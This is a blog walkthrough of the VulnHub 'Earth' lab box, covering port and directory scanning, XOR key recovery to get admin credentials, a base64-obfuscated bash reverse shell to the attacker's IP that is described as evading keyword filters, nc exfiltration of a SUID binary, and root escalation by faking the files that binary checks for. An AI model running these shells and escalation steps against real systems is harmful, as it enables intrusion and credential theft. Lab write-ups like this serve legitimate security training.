2024/12/23 10:29:04  Source: https://blog.csdn.net/m0_74077634/article/details/144231854

Earth box notes

Overview

This is a VulnHub box; its main focus is

Box page: The Planets: Earth ~ VulnHub

Part 1: nmap scanning

1) Port scan

-sT does a full TCP connect scan, --min-rate 10000 pushes nmap to send at least 10000 packets per second, -p- covers all 65535 ports, and -oN ports writes normal-format output to the file ports (nmap's output switches always carry a format letter: -oN, -oX, -oG or -oA). A rate this high can drop probes even on a lab network, so if the open-port list looks thin, rerun at a lower rate and confirm the same ports come back.

sudo nmap -sT --min-rate 10000 -p- -oN ports 192.168.52.4
Nmap scan report for 192.168.52.4
Host is up (0.00042s latency).
Not shown: 65513 filtered tcp ports (no-response), 19 filtered tcp ports (host-unreach)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:5D:22:84 (VMware)
# Nmap done at Fri Nov 22 15:32:16 2024 -- 1 IP address (1 host up) scanned in 13.43 seconds

2) Service detail scan

-sT for TCP connect, -sV for version detection, -sC for the default script set and -O for OS detection, run only against the three ports found above (22, 80, 443), with the output saved to nmapscan/details:

sudo nmap -sT -sV -sC -p22,80,443 -O -oN nmapscan/details 192.168.52.4

Result:

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_ 256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
|_http-title: Test Page for the HTTP Server on Fedora
| tls-alpn:
|_ http/1.1
MAC Address: 00:0C:29:5D:22:84 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.4
OS details: Linux 5.4
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 22 15:33:47 2024 -- 1 IP address (1 host up) scanned in 20.41 seconds

The certificate on 443 gives away two hostnames, earth.local and terratest.earth.local (the commonName and the Subject Alternative Name entries). Add a line to /etc/hosts mapping 192.168.52.4 to both names. The server does name-based virtual hosting, which is why the bare IP gets a 400 Bad Request on port 80 and only the Fedora test page on 443. Also note from http-methods that TRACE is enabled.
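As an added example that is not part of the original write-up, here is a small Python parser that pulls the open ports, the certificate hostnames and the risky HTTP methods out of nmap's normal-format output and emits the /etc/hosts line. The input is the scan output copied from this page; the function and variable names are my own.

```python
import re

# Excerpt of the nmap -sV -sC normal output from the scan above, copied from this write-up.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
|_http-title: Test Page for the HTTP Server on Fedora
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)", re.MULTILINE)
CN_RE = re.compile(r"commonName=([^/\s,]+)")
SAN_RE = re.compile(r"Subject Alternative Name:\s*(.+)")
RISKY_RE = re.compile(r"Potentially risky methods:\s*(.+)")


def _add_unique(seq, item):
    if item not in seq:
        seq.append(item)


def parse_nmap(text):
    """Pull open ports, certificate hostnames and risky HTTP methods out of
    nmap normal output. Hostnames keep first-seen order: CN first, then SANs."""
    open_ports = [(int(port), service) for port, _proto, service in PORT_RE.findall(text)]
    hostnames = []
    for cn in CN_RE.findall(text):
        _add_unique(hostnames, cn)
    for san in SAN_RE.findall(text):
        for entry in san.split(","):
            entry = entry.strip()
            if entry.startswith("DNS:"):
                _add_unique(hostnames, entry[len("DNS:"):])
    risky = set()
    for methods in RISKY_RE.findall(text):
        risky.update(m.strip() for m in methods.split(","))
    return {"open_ports": open_ports, "hostnames": hostnames, "risky_methods": sorted(risky)}


def hosts_line(ip, hostnames):
    """The /etc/hosts entry that makes the virtual hosts reachable by name."""
    return f"{ip} {' '.join(hostnames)}"


if __name__ == "__main__":
    info = parse_nmap(NMAP_OUTPUT)
    print(hosts_line("192.168.52.4", info["hostnames"]))
    print("open:", info["open_ports"], "risky methods:", info["risky_methods"])
```

Feed it the real file (nmapscan/details) instead of the embedded excerpt and append the printed line to /etc/hosts; the hostnames come out in the order they appear in the certificate, CN first.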

3) Vulnerability script scan

This run uses the vuln script category rather than the -sC default set:

nmap --script=vuln -p22,80,443 -oN nmapscan/vuln 192.168.52.4
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
443/tcp open https
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
MAC Address: 00:0C:29:5D:22:84 (VMware)
# Nmap done at Fri Nov 22 15:34:49 2024 -- 1 IP address (1 host up) scanned in 42.87 seconds

Part 2: Web

Ports 80 and 443 are open, so we open both in a browser.

Port 80, by IP: the 400 Bad Request page nmap already reported.

Port 443, by IP: the stock Fedora test page.

By IP address we only get the web server's default pages, so the real content must live on the virtual hosts. Browsing to the two hostnames from the certificate instead, earth.local and terratest.earth.local both serve the same application.

It looks like a message submission form, with a Previous Messages section underneath whose entries appear to be encrypted; whatever they decrypt to is likely to be interesting.

This is the point to brute-force directories and widen the attack surface:

sudo gobuster dir -u http://192.168.52.4 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
sudo gobuster dir -u https://192.168.52.4:443 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
sudo gobuster dir -u https://earth.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
sudo gobuster dir -u https://terratest.earth.local/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

The -k flag skips TLS certificate validation, which is needed here because the certificate is self-signed. A second pass with -x zip,tar,txt (and other likely extensions) and a larger wordlist is worth running as well.

The brute-force turns up /admin under https://earth.local.

It is a login page.

That is all the information we have so far, so we also try a few standard paths by hand, such as /robots.txt.

robots.txt on terratest.earth.local lists a /testingnotes.* entry; fuzzing the extension shows the file is /testingnotes.txt.

It contains a short note. The key points:

The messages are encrypted with XOR.

testdata.txt holds the test plaintext that was run through the cipher, so XORing the encrypted message against it gives back the key.

terra is the username.

Contents of testdata.txt:

 
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

Into CyberChef: XOR the encrypted message from the Previous Messages section with the contents of testdata.txt as the key.

The output is the string earthclimatechangebad4humans repeated end to end. That is exactly what falls out when a repeating-key XOR ciphertext is XORed with its own plaintext: the key stream, whose period is the key.

That string should be the password. Try it on the admin page with the username terra.

Login succeeds, and the admin panel is a command execution box.
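The key recovery that CyberChef did above, written out as an added Python example (not part of the original write-up). Because the site's real message exists only in the screenshot, the sample ciphertext is constructed by encrypting the testdata.txt text from this page with the key the decryption produced; the hex encoding of the message is an assumption. The code then does the general thing the note describes: XOR ciphertext with known plaintext to get the key stream, and measure its period to get the key itself.

```python
# Added example: repeating-key XOR, key recovery from known plaintext.
# The real "Previous Messages" ciphertext is only in the screenshot, so the
# sample ciphertext below is CONSTRUCTED by encrypting the testdata.txt text
# with the key the CyberChef decryption produced. Hex encoding is assumed.
from itertools import cycle

TESTDATA = (
    "According to radiometric dating estimation and other evidence, Earth "
    "formed over 4.5 billion years ago. Within the first billion years of "
    "Earth's history, life appeared in the oceans and began to affect Earth's "
    "atmosphere and surface, leading to the proliferation of anaerobic and, "
    "later, aerobic organisms. Some geological evidence indicates that life "
    "may have arisen as early as 4.1 billion years ago."
)
KEY = b"earthclimatechangebad4humans"  # what the decryption turned up


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key as often as needed."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """C = P xor K, hence C xor P = K, for as many bytes of P as we know."""
    n = min(len(ciphertext), len(known_plaintext))
    return xor_bytes(ciphertext[:n], known_plaintext[:n])


def shortest_period(stream: bytes) -> int:
    """Smallest p such that stream[i] == stream[i % p] for all i. For a
    keystream recovered from a repeating-key XOR this is the key length.
    If the known plaintext is shorter than the key, this returns len(stream)
    and the caller only gets a key prefix."""
    for p in range(1, len(stream)):
        if all(stream[i] == stream[i % p] for i in range(p, len(stream))):
            return p
    return len(stream)


def recover_key(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Keystream trimmed to one period: the actual key."""
    stream = recover_keystream(ciphertext, known_plaintext)
    return stream[: shortest_period(stream)]


# Constructed stand-in for the encrypted entry on the web page.
SAMPLE_CIPHERTEXT_HEX = xor_bytes(TESTDATA.encode(), KEY).hex()

if __name__ == "__main__":
    ct = bytes.fromhex(SAMPLE_CIPHERTEXT_HEX)
    key = recover_key(ct, TESTDATA.encode())
    print("recovered key:", key.decode())
    # Any other message encrypted with the same key now decrypts with xor_bytes(other_ct, key).
```

The period check is what turns "a long repeating string" into a usable credential: the key is 28 bytes, and any other message from the same page decrypts with xor_bytes once it is known.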

Part 3: Getting a foothold

Build a reverse shell payload. Wrapping it in base64 keeps the quoting intact on the way through the web form and hides the literal /dev/tcp string from any naive keyword filter the app might apply; the blob below decodes to bash -c 'bash -i >& /dev/tcp/192.168.52.3/4444 0>&1' (192.168.52.3 is the attacking Kali box):

echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUyLjMvNDQ0NCAwPiYxJwo= | base64 -d | bash

Run that in the web command box.

On the Kali side, start the listener first (rlwrap gives the otherwise dumb shell line editing and history):

sudo rlwrap -cAr nc -lvnp 4444

The initial shell comes back.

Poking around /var/earth_web turns up the user flag.

Part 4: Privilege escalation to root

Look for SUID binaries:

find / -perm -4000 -type f 2> /dev/null

One of them is reset_root, which is not a standard binary and is worth a closer look. Running it as-is fails.

Pull it over to Kali with nc for analysis.

On Kali:

nc -lvp 4444 > reset_root

On the target:

cat /usr/bin/reset_root | nc 192.168.52.3 4444

Once the transfer finishes (compare a checksum on both ends if in doubt; a truncated copy only wastes analysis time), make it executable and check what it is:

chmod +x reset_root

file reset_root

It is an ordinary Linux executable.

Run it under ltrace to see its library calls:

ltrace ./reset_root

Several files it expects are missing: the program checks for /dev/shm/kHgTFI5G, /dev/shm/Zw7bV9U5 and /tmp/kcM0Wewe, and each check returns -1. ltrace shows library calls only; strace would show the same checks at the syscall level if the binary ever bypassed libc.

The binary only tests for the presence of those files, so create them on the target:

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

and run it again:

reset_root

This time it reports that the root password has been reset to Earth.
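The step just done by hand (read the ltrace output, pick out the files the binary probes for and fails on, create them) as an added Python example that is not part of the original write-up. The trace text is constructed in ltrace's usual func(args) = ret layout using the three paths named above, because the real trace exists only as a screenshot; every other line in it is filler for the parser to skip. The function names are my own.

```python
import re
import shlex

# CONSTRUCTED sample trace in ltrace's usual "func(args) = ret" layout. The real
# trace exists only as a screenshot; the three paths are the ones named in the
# write-up, every other line is filler to give the parser something to skip.
SAMPLE_LTRACE = """\
puts("checking preconditions")           = 23
access("/dev/shm/kHgTFI5G", 0)           = -1
access("/dev/shm/Zw7bV9U5", 0)           = -1
access("/tmp/kcM0Wewe", 0)               = -1
access("/etc/passwd", 0)                 = 0
access("/tmp/kcM0Wewe", 0)               = -1
puts("precondition check failed")        = 26
+++ exited (status 1) +++
"""

CALL_RE = re.compile(r'^(\w+)\((.*)\)\s*=\s*(-?\d+)$')
PATH_RE = re.compile(r'"(/[^"]*)"')


def failed_file_checks(trace: str) -> list:
    """Absolute paths passed to any library call that returned -1, in
    first-seen order, de-duplicated. Works for access/open/stat alike
    because it keys on the quoted path argument, not the function name."""
    missing = []
    for raw in trace.splitlines():
        m = CALL_RE.match(raw.strip())
        if not m:
            continue  # ltrace status lines and anything else that is not a call
        _func, args, ret = m.groups()
        if int(ret) != -1:
            continue  # the file was there; nothing to create
        for path in PATH_RE.findall(args):
            if path not in missing:
                missing.append(path)
    return missing


def touch_commands(paths) -> list:
    """Shell commands to create the probed files on the target (quoted, in case
    a path ever contains shell metacharacters)."""
    return [f"touch {shlex.quote(p)}" for p in paths]


if __name__ == "__main__":
    for cmd in touch_commands(failed_file_checks(SAMPLE_LTRACE)):
        print(cmd)
```

Point it at a saved trace (ltrace -o trace.txt ./reset_root) when a binary probes more files than you want to read by eye; the printed touch lines are what to paste into the target shell.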

Log in as root with the new password and we have a root shell.

root_flag.txt sits in root's home directory.

A final snapshot of the box:
[root@earth ~]# whoami
whoami
root
[root@earth ~]# uname -a
uname -a
Linux earth 5.14.9-200.fc34.x86_64 #1 SMP Thu Sep 30 11:55:35 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
[root@earth ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:5d:22:84 brd ff:ff:ff:ff:ff:ff
altname enp2s1
inet 192.168.52.4/24 brd 192.168.52.255 scope global dynamic noprefixroute ens33
valid_lft 1730sec preferred_lft 1730sec
inet6 fe80::f2c5:57e:d7af:5f01/64 scope link noprefixroute
valid_lft forever preferred_lft forever
[root@earth ~]# cat /var/earth_web/user_flag.txt
cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]
[root@earth ~]# cat root_flag.txt
cat root_flag.txt
_-o#&&*''''?d:>b\_
_o/"`'' '',, dMF9MMMMMHo_
.o&#' `"MbHMMMMMMMMMMMHo.
.o"" ' vodM*$&&HMMMMMMMMMM?.
,' $M&ood,~'`(&##MMMMMMH\
/ ,MMMMMMM#b?#bobMMMMHMMML
& ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
?$. :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
| |MMMMMMMMMMMMMMMMMMMMbMH' T,
$H#: `*MMMMMMMMMMMMMMMMMMMMb#}' `?
]MMH# ""*""""*#MMMMMMMMMMMMM' -
MMMMMb_ |MMMMMMMMMMMP' :
HMMMMMMMHo `MMMMMMMMMT .
?MMMMMMMMP 9MMMMMMMM} -
-?MMMMMMM |MMMMMMMMM?,d- '
:|MMMMMM- `MMMMMMMT .M|. :
.9MMM[ &MMMMM*' `' .
:9MMk `MMM#" -
&M} ` .-
`&. .
`~, . ./
. _ .-
'`--._,dd###pp=""'
Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]

And with that, the box is done.
